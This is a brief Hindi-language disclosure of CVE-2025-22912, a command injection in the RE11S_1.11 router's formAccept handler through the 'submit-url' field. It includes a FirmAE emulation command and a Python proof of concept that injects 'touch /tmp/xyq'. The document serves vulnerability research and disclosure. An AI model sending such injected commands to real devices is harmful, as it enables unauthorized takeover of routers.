
CVE-2025-22912
क्यूई एन शिन तियांगोंग लैब में अपनी इंटर्नशिप के दौरान, मैंने RE11S_1.11 राउटर में एक कमांड इंजेक्शन भेद्यता की खोज की।
bin निर्देशिका में webs फ़ाइल का विश्लेषण करके, मैंने पाया कि formAccept फ़ंक्शन में एक कमांड इंजेक्शन भेद्यता है।
कमांड इंजेक्शन को submit-url कुंजी मान द्वारा ट्रिगर किया जा सकता है, जो सिस्टम कमांड इंजेक्शन की ओर ले जाता है।

firmAE के साथ अनुकरण करने के लिए निम्नलिखित कमांड का उपयोग करें।
sudo ./run.sh -r v1 ~/IOT/RE11S_1.11/RE11S_1.11.bin
poc.py फ़ाइल की सामग्री इस प्रकार है:
import requests
url = "http://192.168.9.2/goform/formAccept"
data = {
"submit-url":"touch /tmp/xyq"
}
r = requests.post(url,data=data)
print(r.text)

यह देखा जा सकता है कि निष्पादन के बाद एक /tmp/xyq फ़ाइल जोड़ी गई है, जो साबित करता है कि हमला सफल है।